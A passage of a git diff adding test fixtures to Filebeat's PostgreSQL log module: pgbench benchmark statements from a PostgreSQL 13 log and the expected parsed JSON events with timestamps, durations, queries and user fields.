postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:20.137 UTC [190] postgres@accounts LOG: duration: 0.141 ms +2021-03-17 15:18:20.137 UTC [190] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 1240 WHERE aid = 12035; +2021-03-17 15:18:20.138 UTC [190] postgres@accounts LOG: duration: 0.953 ms +2021-03-17 15:18:20.138 UTC [190] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 12035; +2021-03-17 15:18:20.138 UTC [190] postgres@accounts LOG: duration: 0.120 ms +2021-03-17 15:18:20.138 UTC [190] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 1240 WHERE tid = 10; +2021-03-17 15:18:20.138 UTC [190] postgres@accounts LOG: duration: 0.256 ms +2021-03-17 15:18:20.139 UTC [190] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 1240 WHERE bid = 1; +2021-03-17 15:18:20.139 UTC [190] postgres@accounts LOG: duration: 0.214 ms +2021-03-17 15:18:20.139 UTC [190] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (10, 1, 12035, 1240, CURRENT_TIMESTAMP); +2021-03-17 15:18:20.139 UTC [190] postgres@accounts LOG: duration: 0.191 ms +2021-03-17 15:18:20.139 UTC [190] postgres@accounts LOG: statement: END; +2021-03-17 15:18:20.140 UTC [190] postgres@accounts LOG: duration: 0.874 ms +2021-03-17 15:18:21.461 UTC [191] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:21.461 UTC [191] postgres@accounts LOG: duration: 0.282 ms +2021-03-17 15:18:21.461 UTC [191] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + -3890 WHERE aid = 82888; +2021-03-17 15:18:21.464 UTC [191] postgres@accounts LOG: duration: 2.364 ms +2021-03-17 15:18:21.464 UTC [191] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 82888; +2021-03-17 15:18:21.464 UTC [191] postgres@accounts LOG: duration: 0.339 ms +2021-03-17 15:18:21.464 UTC [191] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + -3890 WHERE tid = 2; +2021-03-17 15:18:21.465 UTC [191] postgres@accounts LOG: duration: 0.716 ms +2021-03-17 15:18:21.465 UTC [191] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + -3890 WHERE bid = 1; +2021-03-17 15:18:21.466 UTC [191] postgres@accounts LOG: duration: 0.644 ms +2021-03-17 15:18:21.466 UTC [191] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (2, 1, 82888, -3890, CURRENT_TIMESTAMP); +2021-03-17 15:18:21.466 UTC [191] postgres@accounts LOG: duration: 0.537 ms +2021-03-17 15:18:21.467 UTC [191] postgres@accounts LOG: statement: END; +2021-03-17 15:18:21.469 UTC [191] postgres@accounts LOG: duration: 2.604 ms +2021-03-17 15:18:21.551 UTC [192] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:21.551 UTC [192] postgres@accounts LOG: duration: 0.676 ms +2021-03-17 15:18:21.552 UTC [192] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 2966 WHERE aid = 21833; +2021-03-17 15:18:21.554 UTC [192] postgres@accounts LOG: duration: 2.755 ms +2021-03-17 15:18:21.555 UTC [192] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 21833; +2021-03-17 15:18:21.555 UTC [192] postgres@accounts LOG: duration: 0.329 ms +2021-03-17 15:18:21.555 UTC [192] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 2966 WHERE tid = 9; +2021-03-17 15:18:21.556 UTC [192] postgres@accounts LOG: duration: 0.630 ms +2021-03-17 15:18:21.556 UTC [192] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 2966 WHERE bid = 1; +2021-03-17 15:18:21.557 UTC [192] postgres@accounts LOG: duration: 0.690 ms +2021-03-17 15:18:21.557 UTC [192] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (9, 1, 21833, 2966, CURRENT_TIMESTAMP); +2021-03-17 15:18:21.557 UTC [192] postgres@accounts LOG: duration: 0.542 ms +2021-03-17 15:18:21.558 UTC [192] postgres@accounts LOG: statement: END; +2021-03-17 15:18:21.559 UTC [192] postgres@accounts LOG: duration: 1.938 ms +2021-03-17 15:18:22.825 UTC [193] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:22.825 UTC [193] postgres@accounts LOG: duration: 0.280 ms +2021-03-17 15:18:22.826 UTC [193] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + -442 WHERE aid = 93281; +2021-03-17 15:18:22.828 UTC [193] postgres@accounts LOG: duration: 2.183 ms +2021-03-17 15:18:22.828 UTC [193] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 93281; +2021-03-17 15:18:22.828 UTC [193] postgres@accounts LOG: duration: 0.302 ms +2021-03-17 15:18:22.828 UTC [193] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + -442 WHERE tid = 4; +2021-03-17 15:18:22.829 UTC [193] postgres@accounts LOG: duration: 0.703 ms +2021-03-17 15:18:22.829 UTC [193] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + -442 WHERE bid = 1; +2021-03-17 15:18:22.830 UTC [193] postgres@accounts LOG: duration: 0.759 ms +2021-03-17 15:18:22.830 UTC [193] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (4, 1, 93281, -442, CURRENT_TIMESTAMP); +2021-03-17 15:18:22.831 UTC [193] postgres@accounts LOG: duration: 0.773 ms +2021-03-17 15:18:22.831 UTC [193] postgres@accounts LOG: statement: END; +2021-03-17 15:18:22.833 UTC [193] postgres@accounts LOG: duration: 2.048 ms +2021-03-17 15:18:22.881 UTC [194] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:18:22.881 UTC [194] postgres@accounts LOG: duration: 0.316 ms +2021-03-17 15:18:22.881 UTC [194] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + -1591 WHERE aid = 2814; +2021-03-17 15:18:22.884 UTC [194] postgres@accounts LOG: duration: 2.911 ms +2021-03-17 15:18:22.884 UTC [194] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 2814; +2021-03-17 15:18:22.885 UTC [194] postgres@accounts LOG: duration: 0.695 ms +2021-03-17 15:18:22.885 UTC [194] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + -1591 WHERE tid = 10; +2021-03-17 15:18:22.886 UTC [194] postgres@accounts LOG: duration: 0.902 ms +2021-03-17 15:18:22.886 UTC [194] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + -1591 WHERE bid = 1; +2021-03-17 15:18:22.887 UTC [194] postgres@accounts LOG: duration: 0.863 ms +2021-03-17 15:18:22.887 UTC [194] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (10, 1, 2814, -1591, CURRENT_TIMESTAMP); +2021-03-17 15:18:22.888 UTC [194] postgres@accounts LOG: duration: 0.584 ms +2021-03-17 15:18:22.890 UTC [194] postgres@accounts LOG: statement: END; diff --git a/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log-expected.json b/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log-expected.json new file mode 100644 index 00000000000..537b6690903 --- /dev/null +++ b/filebeat/module/postgresql/log/test/postgresql-13-log-statement-all.log-expected.json @@ -0,0 +1,2702 @@ +[ + { + "@timestamp": "2021-03-17T15:18:00.201Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 0, + "message": "2021-03-17 15:18:00.201 UTC [149] postgres@postgres LOG: statement: CREATE DATABASE accounts;", + "postgresql.log.database": "postgres", + "postgresql.log.query": "CREATE DATABASE accounts;", + "postgresql.log.timestamp": "2021-03-17 15:18:00.201 UTC", + "process.pid": 149, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:00.631Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 430394016, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 95, + "message": "2021-03-17 15:18:00.631 UTC [149] postgres@postgres LOG: duration: 430.394 ms", + "postgresql.log.database": "postgres", + "postgresql.log.timestamp": "2021-03-17 15:18:00.631 UTC", + "process.pid": 149, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.732Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 174, + "message": "2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: statement: drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:02.732 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.732Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 559000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 333, + "message": "2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: duration: 0.559 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.732 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.732Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 410, + "message": "2021-03-17 15:18:02.732 UTC [151] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.timestamp": "2021-03-17 15:18:02.732 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.737Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 4812000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 578, + "message": "2021-03-17 15:18:02.737 UTC [151] postgres@accounts LOG: duration: 4.812 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.737 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.738Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 655, + "message": "2021-03-17 15:18:02.738 UTC [151] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.738 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.740Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1900000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 830, + "message": "2021-03-17 15:18:02.740 UTC [151] postgres@accounts LOG: duration: 1.900 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.740 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.740Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 907, + "message": "2021-03-17 15:18:02.740 UTC [151] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.740 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.741Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1444000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1086, + "message": "2021-03-17 15:18:02.741 UTC [151] postgres@accounts LOG: duration: 1.444 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.741 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.741Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1163, + "message": "2021-03-17 15:18:02.741 UTC [151] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.741 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.743Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1336000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1331, + "message": "2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: duration: 1.336 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.743 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.743Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1408, + "message": "2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: statement: begin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "begin", + "postgresql.log.timestamp": "2021-03-17 15:18:02.743 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.743Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 68000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1483, + "message": "2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: duration: 0.068 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.743 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.743Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1560, + "message": "2021-03-17 15:18:02.743 UTC [151] postgres@accounts LOG: statement: truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:02.743 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.744Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 656000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1713, + "message": "2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: duration: 0.656 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.744 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.744Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1790, + "message": "2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.744 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.744Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 538000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1914, + "message": "2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: duration: 0.538 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.744 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.744Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1991, + "message": "2021-03-17 15:18:02.744 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.744 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.745Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 304000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2121, + "message": "2021-03-17 15:18:02.745 UTC [151] postgres@accounts LOG: duration: 0.304 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.745 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.745Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2198, + "message": "2021-03-17 15:18:02.745 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.745 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1510000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2328, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 1.510 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2405, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 94000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2535, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.094 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2612, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (4,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 56000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2742, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.056 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2819, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (5,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.746Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 52000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2949, + "message": "2021-03-17 15:18:02.746 UTC [151] postgres@accounts LOG: duration: 0.052 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.746 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3026, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (6,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 51000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3156, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.051 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3233, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (7,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 51000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3363, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.051 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + 